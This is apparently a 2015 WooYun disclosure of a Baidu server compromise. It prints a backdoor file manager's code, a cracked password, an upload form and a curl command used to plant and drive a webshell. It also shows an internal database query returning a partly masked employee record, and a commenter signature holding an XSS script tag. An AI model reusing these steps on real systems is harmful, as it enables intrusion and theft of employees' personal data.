当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125345

漏洞标题:神器而已之百度某站GETSHELL步步深入内网可获取部分员工数据

相关厂商:百度

漏洞作者: 举起手来

提交时间:2015-07-08 11:55

修复时间:2015-08-22 14:10

公开时间:2015-08-22 14:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向核心白帽子及相关领域专家公开
2015-07-28: 细节向普通白帽子公开
2015-08-07: 细节向实习白帽子公开
2015-08-22: 细节向公众公开

简要描述:

神器而已,一如既往,只需要一个很小的漏洞。

详细说明:

第一节:一个备份的代码包泄露

220.181.163.222:8000/admin.tar.gz


第二节:代码审计
解压缩代码包以后发现是这样一个线上地址:http://220.181.163.222:8000/admin/webroot/index.php
但是直接访问这个地址会跳转到https://itebeta.baidu.com/;说明他也许是一个内部服务吧,

➜  baidu  curl http://220.181.163.222:8000/admin/webroot/index.php -vv
* Hostname was NOT found in DNS cache
* Trying 220.181.163.222...
* Connected to 220.181.163.222 (220.181.163.222) port 8000 (#0)
> GET /admin/webroot/index.php HTTP/1.1
> User-Agent: curl/7.37.1
> Host: 220.181.163.222:8000
> Accept: */*
>
< HTTP/1.1 302 Found
* Server nginx/1.2.4 is not blacklisted
< Server: nginx/1.2.4
< Date: Wed, 08 Jul 2015 03:20:26 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: close
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Location: https://itebeta.baidu.com/login?service=http%3A%2F%2F220.181.163.222%3A8000%2Fadmin%2Fwebroot%2Findex.php
< Pragma: no-cache


好,正式开始审计;看代码发现是CodeIgniter.php框架;我们看下关键文件admin/application/core/BD_Controller.php

require_once(APPPATH . 'third_party/cas/CAS.php');
class BD_Controller extends CI_Controller {
protected $vdata = array();
protected $user = null;
protected $mkey = null;
protected $layout = 'layout';
/**
* @brief array 可跳过验证模块
*
* @var array
* @acccess public
*/
protected $_arrSkipModule = array(
'sync/appreceive',
'sync/appoffline',
'sync/receive',
'sync/notify',
'api/dotask',
'bossapi/getapp',
'applist/synccallback',
'api/copyright',
'untest/checkfile',
'untest/openfile',
'untest/delfile',
'untest/uploadfile'
);


从上面这段代码可以看到这些接口是不需要统一登录认证的,尤其是untest/* 这几个接口,简直就是特么的后门啊;我们看代码:

<?php
if (!defined('BASEPATH'))
exit('No direct script access allowed');
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
/**
* Description of unittest
*
* @author Administrator
*/
class Untest extends BD_Controller {
public function __construct() {
parent::__construct();
}
// 列目录
public function checkfile() {
if (!$this->isLogined()) {
return;
}
$this->load->library('httphelper');
$remoteip = httphelper::GetClientIP();
echo '<html><head><title>file-' . $remoteip . '</title></head><body style="font-size:14px;">';
if (empty($_GET['d'])) {
echo '当前文件:' . __FILE__ . ' 未输入目录cc';
return;
}
$dir = $_GET['d'];
//$dir = iconv('utf-8', 'gb2312', $dir);
if (!is_dir($dir)) {
if (is_file($dir)) {
echo '文件:<a href="openfile?d=' . $dir . '&a" target="_blank">' . $dir . '</a>';
return;
}
echo '不是文件也不是目录:' . $dir;
return;
}
if ($dh = opendir($dir)) {
// 移除最后一个斜杠
$chEnd = $dir[strlen($dir) - 1];
if ($chEnd == '/' || $chEnd == '\\') {
$dir = substr($dir, 0, strlen($dir) - 1);
}
// 遍历当前目录
$arrDir = array();
$arrFile = array();
while (($file = readdir($dh)) !== false) {
if ($file != '.' && $file != '..') {
$showname = iconv('gb2312', 'utf-8', $file);
$fullpath = $dir . '/' . $file;
if (is_file($fullpath))
$arrFile[$showname] = $fullpath;
else if (is_dir($fullpath))
$arrDir[$showname] = $fullpath;
else
echo '未知:' . $file . '<br/>';
}
}
closedir($dh);
echo '<script type="text/javascript" src="http://appsearchcdn.baidu.com/statics/game/static/lib/jq_e558165.js"></script>';
echo '<script type="text/javascript" src="http://bcs.91.com/rbpiczy/client91_cache/other/rowColor.js"></script>';
echo '<div style="color:blue;font-weight:bold;">说明:如果要下载文件,请按右键,另存为... | 当前访问目录 ' . $dir . '</div>';
echo '<table id="tbData" border="0" cellspacing="0" cellpadding="0" style="table-layout:fixed;border-collapse:collapse">';
echo '<tr>'
. '<th>序号</th>'
. '<th style="width:400px;">名称</th>'
. '<th style="width:120px;">大小(字节)</th>'
. '<th style="width:180px;">修改时间</th>'
//. '<th style="width:100px;">操作</th>'
. '</tr>' . "\n";
// 显示父目录
if ($dir != '') {
$parent = substr($dir, 0, strripos($dir, '/'));
if ($parent != '')
echo '<tr onmouseover="onRowOver(this);" onmouseout="onRowOut(this);" onclick="onRowClick(this);">'
. '<td></td><td><a href="checkfile?d=' . urlencode($parent) . '&">..</a></td>'
. '<td></td><td></td><td></td></tr>' . "\n";
}
$colors = array("#ffffff", "#dadada");
$idx = 1;
// 先显示所有目录
natcasesort($arrDir);
foreach ($arrDir as $key => $value) {
echo '<tr onmouseover="onRowOver(this);" onmouseout="onRowOut(this);" onclick="onRowClick(this);"'
. ' style="background-color:' . $colors[$idx % 2] . '" dir="' . urlencode($value) . '">'
. '<td>' . $idx . '</td>'
. '<td><a>' . $key . '</a></td>'
. '<td style="text-align:center;">目录</td>'
. '<td style="text-align:center;">' . date("Y-m-d H:i:s", filemtime($value)) . '</td>'
//. '<td><a>改名</a>|<a>删除</a></td>'
. '</tr>' . "\n";
$idx++;
}
// 再显示所有文件
natcasesort($arrFile);
foreach ($arrFile as $key => $value) {
echo '<tr onmouseover="onRowOver(this);" onmouseout="onRowOut(this);" onclick="onRowClick(this);"'
. ' style="background-color:' . $colors[$idx % 2] . '" file="' . urlencode($value) . '">'
. '<td>' . $idx . '</td>'
. '<td><a target="_blank">' . $key . '</a></td>'
. '<td style="text-align:right;">' . number_format(filesize($value)) . '</td>'
. '<td style="text-align:center;">' . date("Y-m-d H:i:s", filemtime($value)) . '</td>'
//. '<td><a>改名</a>|<a>删除</a></td>'
. '</tr>' . "\n";
$idx++;
}
echo '</table>';
echo <<<EndMark
<script type="text/javascript">
$(function(){
$("#tbData tr[dir]").each(function(){
tr = $(this);
dir = tr.attr("dir");
if(!dir)
return;
openLnk = tr.find("a:eq(0)");
tr.find("a:eq(0)").attr("href", "checkfile?d=" + dir + "&");
tr.find("a:eq(2)").attr("href", "#0").click(function(){
if(confirm("你确认要删除目录 " + unescape(dir) + "?")){

}
});
});
$("#tbData tr[file]").each(function(){
tr = $(this);
file = tr.attr("file");
if(!file)
return;
openLnk = tr.find("a:eq(0)");
tr.find("a:eq(0)").attr("href", "openfile?d=" + file + "&");
tr.find("a:eq(2)").attr("href", "#0").click(function(){
if(confirm("你确认要删除文件 " + unescape(file) + "?")){

}
});
});
});
</script>
EndMark;
echo '</body></html>';
}
}
// 打开文件
public function openfile() {
if (!$this->isLogined()) {
return;
}
if (empty($_GET['d'])) {
echo '当前文件:' . __FILE__ . ' 未输入文件';
return;
}
$filepath = $_GET['d'];
if (!is_file($filepath)) {
echo '不是文件:' . $filepath;
return;
}
$size = filesize($filepath);
if (!empty($_GET['size'])) {
var_dump($size);
return;
}
try {
$file = fopen($filepath, 'r'); // 打开文件
Header("Content-type: text/plain");
echo fread($file, filesize($filepath));
fclose($file);
} catch (Exception $exp) {
$msg = $exp->getMessage();
//log_message('error', $msg);
echo $msg;
}
}
// 删除文件
public function delfile() {
if (!$this->isLogined()) {
return;
}
if (empty($_GET['d'])) {
echo '当前文件:' . __FILE__ . ' 未输入文件';
return;
}
$filepath = $_GET['d'];
if (!is_file($filepath)) {
echo '不是文件:' . $filepath;
return;
}
try {
unlink($filepath);
echo 'ok' . $filepath;
} catch (Exception $exp) {
$msg = $exp->getMessage();
//log_message('error', $msg);
echo $msg;
}
}
public function uploadfile() {
if (!$this->isLogined()) {
return;
}

if (isset($_SERVER['REQUEST_METHOD']) &&
$_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['filSelect'])) {
if ($_FILES['filSelect']['error'] > 0) {
echo 'Error: ' . $_FILES['filSelect']['error'] . "<br />";
return;
}
// 获取上传目录
$dir = '/';
if(isset($_POST['dir'])){
$tmpdir = $_POST['dir'];
if(strlen($tmpdir) > 0){
$dir = $tmpdir;
}
}
$lastCh = $dir[strlen($dir) - 1];
if($lastCh !== '/' && $lastCh !== '\\'){
$dir .= '/';
}
// 获取是否覆盖
$overwrite = false;
if(isset($_POST['chkOverwrite']) && $_POST['chkOverwrite'] === 'on'){
$overwrite = true;
}

$savefile = $dir . $_FILES['filSelect']["name"];
// 转码,避免中文文件名问题导致无法保存
$savefileReal = iconv("UTF-8","gb2312", $savefile);
try{
if(!$overwrite && file_exists($savefileReal)){
echo 'file exists: ' . $savefile;
return;
}
move_uploaded_file($_FILES["filSelect"]["tmp_name"], $savefileReal);
}catch(Exception $exp){
echo $exp->getMessage();
return;
}
echo 'Upload: ' . $_FILES['filSelect']["name"] . "<br />";
echo 'Type: ' . $_FILES['filSelect']["type"] . "<br />";
echo 'Size: ' . $_FILES['filSelect']["size"] . "<br />";
echo 'Temp stored: ' . $_FILES['filSelect']["tmp_name"] . " <br />";
echo 'Stored in: ' . $savefile . " <br />";
return;
}// end upload
echo<<<TheEnd
<html>
<body>
<script type="text/javascript" src="http://appsearchcdn.baidu.com/statics/game/static/lib/jq_e558165.js"></script>
<form action="uploadfile" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">
Upload to:<input type="text" name="dir" value="" /><br/>
<label>Filename:<input type="file" name="filSelect" /></label><br/>
<label><input type="checkbox" name="chkOverwrite" />Overwrite while file exists.</label><br/>
<input type="submit" name="submit" value="Submit" />
</form>
<script type="text/javascript">
function checkSubmit(){
if($("input[name='filSelect']").val().length == 0){
alert("please select file.");
return false;
}
if($("input[name='chkOverwrite']").is(":checked") && !confirm("file will be overwrite, continue???")){
return false;
}
return true;
}
</script>
</body>
</html>
TheEnd;
}
}
?>%


我们看看这个逻辑里面加了一个密码验证。就是后门啊,找到对应的逻辑

// 判断是否成功登录,用于测试方法安全校验
protected function isLogined() {
$this->load->library('session');
$pwdmd5_ver = '657541db7dde258fe2c905b1b361a039';
$txtPwd = 'txtPwd';
if (isset($_POST[$txtPwd])) {
$pwdmd5 = md5($_POST[$txtPwd]);
if ($pwdmd5 === $pwdmd5_ver) {
// 设置Session
$this->session->set_userdata($txtPwd, $pwdmd5);
return true;
}
}
// 没有POST时,读Session
$sessionPwd = $this->session->userdata($txtPwd);
if (!empty($sessionPwd) && $sessionPwd === $pwdmd5_ver) {
return true;
}
// 显示登录窗体
$this->showLogin();
return false;
}


破解下MD5 657541db7dde258fe2c905b1b361a039 运气不错,解出来是youtqnd

liemulu.png


接着利用这个后门上传文件

<html>
<body>
<form action="http://220.181.163.222:8000/admin/webroot/index.php/untest/uploadfile" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="text" name="dir" value="/home/work/orp/webroot/admin/webroot/css/" />
<input type="text" name="txtPwd" value="youtqnd" />
<input type="file" name="filSelect" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>


然后就是可以传shell了

51A0996C-F17F-4870-8CF4-B463B47DA742.png


第三节:深入内网,获取数据
测试需要写一个mysql的代理,然后跑了一个c段

27DF1D3A-E79C-4F7D-B4C6-CD17E728E3ED.png


扫到一堆,找一个试试:

mysql1.png


然后竟然发现有一个数据库里藏着大量员工数据:包括电话,部门,汇报关系,级别,身份证,入职时间等等

10w.png


看看XXX的数据

11.jpg


第最后一节,拿一台内网机器玩玩把~

76FDE08E-FEB0-4859-980E-86E74B70CD2E.png


2.jpg

漏洞证明:

➜  baidu  curl "http://220.181.163.222:8000/admin/webroot/css/css.php" -d "host=10.48.223.115&user=root&password=root&database=podatabase&sql=select * from duxuetang.raf_user where EMAIL =\"马赛克@baidu.com\" limit 1 "
successarray(124) {
[0]=>
string(5) "21514"
["ID"]=>
string(5) "21514"
[1]=>
string(3) "yli"
["USERNAME"]=>
string(3) "yli"
[2]=>
string(3) "yli"
["PASSWORD"]=>
string(3) "yli"
[3]=>
string(9) "马赛克"
["NAME"]=>
string(9) "马赛克"
[4]=>
string(12) "FORMAL_ENTRY"
["STATE"]=>
string(12) "FORMAL_ENTRY"
[5]=>
string(15) "***@baidu.com"
["EMAIL"]=>
string(15) "***@baidu.com"
[6]=>
NULL
["BIRTHDAY"]=>
NULL
[7]=>
NULL
["DS_ENTP_ID"]=>
NULL
[8]=>
string(2) "36"
["RAF_ENTP_ID"]=>
string(2) "36"
[9]=>
string(3) "101"
["ENTP_CODE"]=>
string(3) "101"
[10]=>
string(12) "百度中国"
["ENTP_NAME"]=>
string(12) "百度中国"
[11]=>
string(3) "103"
["DS_DEPT_ID"]=>
string(3) "103"
[12]=>
string(6) "403000"
["DEPARTMENT_CODE"]=>
string(6) "403000"
[13]=>
string(9) "**办"
["DEPARTMENT_NAME"]=>
string(9) "**办"
[14]=>
string(2) "EO"
["DEPARTMENT_ABBREVIATION"]=>
string(2) "EO"
[15]=>
string(3) "215"
["EMPLOYEE_ID"]=>
string(3) "215"
[16]=>
string(5) "B8888"
["EMPLOYEE_NUMBER"]=>
string(5) "B8888"
[17]=>
string(6) "员工"
["EMPLOYEE_TYPE"]=>
string(6) "员工"
[18]=>
NULL
["ENGLISH_NAME"]=>
NULL
[19]=>
string(2) "25"
["GRADE"]=>
string(2) "25"
[20]=>
string(6) "**"
["GRADE_NAME"]=>
string(6) "**"
[21]=>
string(5) "马赛克"
["HI_NUMBER"]=>
string(5) "马赛克"
[22]=>
string(18) "110马赛克1874"
["ID_CARD_NUMBER"]=>
string(18) "110马赛克1874"
[23]=>
string(5) "...25"
["JOB_DESCRIPTION"]=>
string(5) "...25"
[24]=>
NULL
["WORK_START_DATE"]=>
NULL
[25]=>
NULL
["MOBILE_NUMBER"]=>
NULL
[26]=>
NULL
["PHONE_NUMBER"]=>
NULL
[27]=>
string(5) "15994"
["DS_POSITION_ID"]=>
string(5) "15994"
[28]=>
string(6) "**"
["POSITION_NAME"]=>
string(6) "**"
[29]=>
string(2) "M6"
["POSITION_MAJOR_LEVEL"]=>
string(2) "M6"
[30]=>
string(9) "管理类"
["POSITION_MAJOR_SEQ"]=>
string(9) "管理类"
[31]=>
string(9) "管理类"
["POSITION_MICRO_SEQ"]=>
string(9) "管理类"
[32]=>
string(1) "B"
["POSITION_MINOR_LEVEL"]=>
string(1) "B"
[33]=>
string(6) "管理"
["POSITION_MINOR_SEQ"]=>
string(6) "管理"
[34]=>
NULL
["REGULAR_START_DATE"]=>
NULL
[35]=>
string(10) "2000-01-01"
["SERVICE_START_DATE"]=>
string(10) "2000-01-01"
[36]=>
NULL
["SERVICE_END_DATE"]=>
NULL
[37]=>
NULL
["SEX"]=>
NULL
[38]=>
NULL
["DS_SUPERIOR_ID"]=>
NULL
[39]=>
NULL
["RAF_SUPERIOR_ID"]=>
NULL
[40]=>
NULL
["SUPERIOR_USERNAME"]=>
NULL
[41]=>
NULL
["SUPERIOR_NAME"]=>
NULL
[42]=>
NULL
["SUPERIOR_EMAIL"]=>
NULL
[43]=>
NULL
["ENTRY_LOCATION"]=>
NULL
[44]=>
string(1) "#"
["PHOTO_URL"]=>
string(1) "#"
[45]=>
string(1) "D"
["DS_ACTION"]=>
string(1) "D"
[46]=>
string(6) "153604"
["DS_VERSION"]=>
string(6) "153604"
[47]=>
string(3) "UIC"
["DS_CODE"]=>
string(3) "UIC"
[48]=>
string(5) "24542"
["DS_IDENTITY"]=>
string(5) "24542"
[49]=>
string(3) "155"
["PRINCIPAL_ID"]=>
string(3) "155"
[50]=>
string(19) "2015-01-28 03:00:05"
["VERSION"]=>
string(19) "2015-01-28 03:00:05"
[51]=>
NULL
["BUSINESS_GROUP_NAME"]=>
NULL
[52]=>
NULL
["CARD_HEX"]=>
NULL
[53]=>
NULL
["CARD_NUMBER"]=>
NULL
[54]=>
NULL
["DOMAIN"]=>
NULL
[55]=>
NULL
["ENTRY_SHEET_NUMBER"]=>
NULL
[56]=>
NULL
["EXTERNAL_POSITION"]=>
NULL
[57]=>
NULL
["IN_HQ"]=>
NULL
[58]=>
NULL
["LOCATION"]=>
NULL
[59]=>
NULL
["PAYROLL_ID"]=>
NULL
[60]=>
NULL
["PAYROLL_NAME"]=>
NULL
[61]=>
NULL
["WORK_GROUP"]=>
NULL
}


还有一些机器账号密码泄露

修复方案:

很严重的漏洞!

版权声明:转载请注明来源 举起手来@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-08 14:08

厂商回复:

感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-08 11:56 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    前排

  2. 2015-07-08 11:56 | xtnnd ( 普通白帽子 | Rank:180 漏洞数:43 )

    666

  3. 2015-07-08 11:56 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    自带小板凳

  4. 2015-07-08 11:57 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    第二排

  5. 2015-07-08 11:58 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @浩天 你这都第4排了!~

  6. 2015-07-08 11:58 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    神器!

  7. 2015-07-08 11:59 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    神器VS杀器

  8. 2015-07-08 12:00 | D_in ( 普通白帽子 | Rank:413 漏洞数:62 | 到我嘴里来)

    ccav看这里

  9. 2015-07-08 12:00 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    第九排了

  10. 2015-07-08 12:02 | boooooom 认证白帽子 ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)

    这下又要涨工资了吧!

  11. 2015-07-08 12:02 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    why are you so diao

  12. 2015-07-08 12:03 | Ysql404 ( 实习白帽子 | Rank:95 漏洞数:16 | 。。。。。。。。。。。)

    你为何这么吊

  13. 2015-07-08 12:03 | 几何黑店 ( 核心白帽子 | Rank:1527 漏洞数:231 | 我要低调点儿.......)

    666

  14. 2015-07-08 12:04 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    why are you so diao

  15. 2015-07-08 12:04 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    后排!

  16. 2015-07-08 12:06 | 残废 ( 普通白帽子 | Rank:179 漏洞数:40 | 我是残废,啦啦啦啦)

    瓜子汽水

  17. 2015-07-08 12:08 | Well ( 路人 | Rank:13 漏洞数:5 | 专注python Web渗透)

    乌云出神器

  18. 2015-07-08 12:09 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    又是神一样的注入么

  19. 2015-07-08 12:10 | harbour_bin ( 普通白帽子 | Rank:358 漏洞数:47 | 向TOP200进军!)

    厉害!

  20. 2015-07-08 12:14 | 随随意意 ( 普通白帽子 | Rank:160 漏洞数:35 | 我对XSS并非真爱(┬_┬)最近有人冒充该...)

    看看

  21. 2015-07-08 12:15 | JGHOOluwa ( 普通白帽子 | Rank:206 漏洞数:32 | 就是来看看大牛们如何超神的^-^)

    后排占座

  22. 2015-07-08 12:16 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

  23. 2015-07-08 12:19 | 沦沦 ( 普通白帽子 | Rank:504 漏洞数:127 | 爱老婆,爱生活)

    我靠

  24. 2015-07-08 12:19 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

    神器而已,一如既往,只需要一个很小的漏洞。10W员工数据,包括电话,部门,汇报关系,级别,身份证,入职时间等等

  25. 2015-07-08 12:21 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    NB。。

  26. 2015-07-08 12:24 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    神器屠龙刀吗,这么吊

  27. 2015-07-08 12:25 | 卖C4的小男孩 ( 实习白帽子 | Rank:65 漏洞数:6 | 啦啦啦 啦啦啦 我是一个卖C4的小行家!...)

    围观

  28. 2015-07-08 12:32 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    why are you so diao

  29. 2015-07-08 12:33 | Catsay ( 实习白帽子 | Rank:85 漏洞数:16 | 屌丝一枚)

    什么神器

  30. 2015-07-08 12:40 | 嗯哼! ( 路人 | Rank:0 漏洞数:2 | 人才有点二!)

    求福利,介绍你的神器呗!

  31. 2015-07-08 12:45 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    挤挤

  32. 2015-07-08 12:49 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    专刷闪电的神器!

  33. 2015-07-08 12:52 | 苏州同程旅游网络科技有限公司(乌云厂商)

    这脸打的有点疼的,求修复了主动公开学习下姿势。

  34. 2015-07-08 12:57 | 。帅东。 ( 路人 | Rank:18 漏洞数:4 )

    这才是后排

  35. 2015-07-08 12:58 | 碎片 ( 路人 | Rank:23 漏洞数:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    好样的,我卖瓜子

  36. 2015-07-08 13:00 | Zephyrus ( 路人 | Rank:14 漏洞数:7 | 静心学习)

    围观

  37. 2015-07-08 13:01 | 染血の雪 ( 普通白帽子 | Rank:117 漏洞数:16 | 击缻)

    围观神器

  38. 2015-07-08 13:02 | M4st ( 路人 | Rank:0 漏洞数:1 | 淡退安全 创业Ing~~)

    6666666666

  39. 2015-07-08 13:09 | 07@jyhack.com ( 路人 | Rank:14 漏洞数:10 | 希望和大家多多交流,多多沟通、)

    带着瓜子汽水小板凳围观!

  40. 2015-07-08 13:14 | yichin ( 路人 | Rank:4 漏洞数:2 | 233=_=)

    后排兜售瓜子饮料

  41. 2015-07-08 13:21 | 忽然之间 ( 普通白帽子 | Rank:802 漏洞数:131 | 空白格)

    鸡爪,猪蹄,小玩意换你的神奇如何?

  42. 2015-07-08 13:30 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    举起手来

  43. 2015-07-08 13:50 | Expl0r3r ( 实习白帽子 | Rank:65 漏洞数:13 | 野心大过高潮)

    我有辣条约吗

  44. 2015-07-08 13:51 | 07@jyhack.com ( 路人 | Rank:14 漏洞数:10 | 希望和大家多多交流,多多沟通、)

    @Expl0r3r 吓的我手上的辣条都掉了!

  45. 2015-07-08 13:52 | myhalo ( 普通白帽子 | Rank:281 漏洞数:55 | 所属团队:TSafe)

    思路真棒啊

  46. 2015-07-08 13:54 | 07@jyhack.com ( 路人 | Rank:14 漏洞数:10 | 希望和大家多多交流,多多沟通、)

    话说 如何晋升白帽子啊!

  47. 2015-07-08 14:02 | Non-polar ( 实习白帽子 | Rank:34 漏洞数:16 | 只要还有明天,今天就永远是起跑线)

    神器就是66666666!

  48. 2015-07-08 14:02 | 1937nick ( 实习白帽子 | Rank:97 漏洞数:32 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)

    感谢您的反馈,这是台近期准备下线的测试服务器,目前我们已做下线处理。

  49. 2015-07-08 14:12 | 糖剩七颗 ( 普通白帽子 | Rank:430 漏洞数:61 | 天涯何处无屌丝)

    @07@jyhack.com 30实习 100普通

  50. 2015-07-08 14:14 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    攻击力+999999

  51. 2015-07-08 14:15 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    不是杀器就是神器了

  52. 2015-07-08 14:36 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    么的这么多潜水的

  53. 2015-07-08 15:07 | etcat ( 普通白帽子 | Rank:149 漏洞数:22 | 0101010101001010101010101010100101010101...)

    妹子联系方式 可否提供 我想跟他们深入学习百度排名 哈哈哈

  54. 2015-07-08 15:10 | yeless ( 路人 | Rank:0 漏洞数:1 | aa)

    可否发个联系方式,我想跟他们探讨百度算法以及深入学习百度排名,哈哈哈

  55. 2015-07-08 15:13 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    吓的百度都不会说话了。

  56. 2015-07-08 15:44 | FallenAngel ( 路人 | 还没有发布任何漏洞 | 啊喔呃咿呜喻。。0.0)

    Mark

  57. 2015-07-08 15:51 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    Mark

  58. 2015-07-08 15:52 | 無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策,此信息未予显示。)

    神奇,,,还是器呢,, 器吧。。

  59. 2015-07-08 16:26 | 嗯哼! ( 路人 | Rank:0 漏洞数:2 | 人才有点二!)

    感谢您的反馈,这是台近期准备下线的测试服务器,目前我们已做下线处理。

  60. 2015-07-08 19:57 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    神器就是curl,不要问我怎么知道的,我是核心普通白帽子

  61. 2015-07-09 10:22 | hwut ( 实习白帽子 | Rank:32 漏洞数:5 | 做点自己喜欢的事)

    @黑暗游侠 确定不是WGET么?

  62. 2015-07-09 10:57 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    这是谁的小号,好腻害!

  63. 2015-07-09 13:00 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @hwut 就是curl,我是普通核心,头先普通,可以看核心漏洞

  64. 2015-07-09 14:38 | 鬼见愁 ( 路人 | Rank:10 漏洞数:1 | 挖洞之神)

    李彦宏 二字哪里去了

  65. 2015-07-09 18:38 | 07@jyhack.com ( 路人 | Rank:14 漏洞数:10 | 希望和大家多多交流,多多沟通、)

    吓得百度都不不知所措了

  66. 2015-07-28 16:08 | JGHOOluwa ( 普通白帽子 | Rank:206 漏洞数:32 | 就是来看看大牛们如何超神的^-^)

    漏洞证明里面身份证信息好亮!

  67. 2015-07-28 18:52 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    啥子神器 MySQL代理又是啥子高科技

  68. 2015-07-28 19:17 | 大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)

    好棒!

  69. 2015-07-31 09:07 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    @举起手来 问一下,上面的那个jae.php代理是怎么回事?

  70. 2015-08-06 14:03 | 纷纭 ( 路人 | Rank:19 漏洞数:8 | 学习者。)

    屠龙刀 还是倚天剑?还是死神镰刀~ 还是打神鞭 ~~

  71. 2015-08-18 23:25 | 小红猪 ( 普通白帽子 | Rank:194 漏洞数:30 | Wow~~~哈哈~~~)

    大牛就是花样多,值得学习

  72. 2015-08-23 03:37 | 你大爷在此 百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们 大家好 我是王尼玛)

    53楼 真逗

  73. 2015-08-23 17:22 | Busliv ( 普通白帽子 | Rank:146 漏洞数:16 | to be,and to be)

    竟然机智到去扫mysql弱口令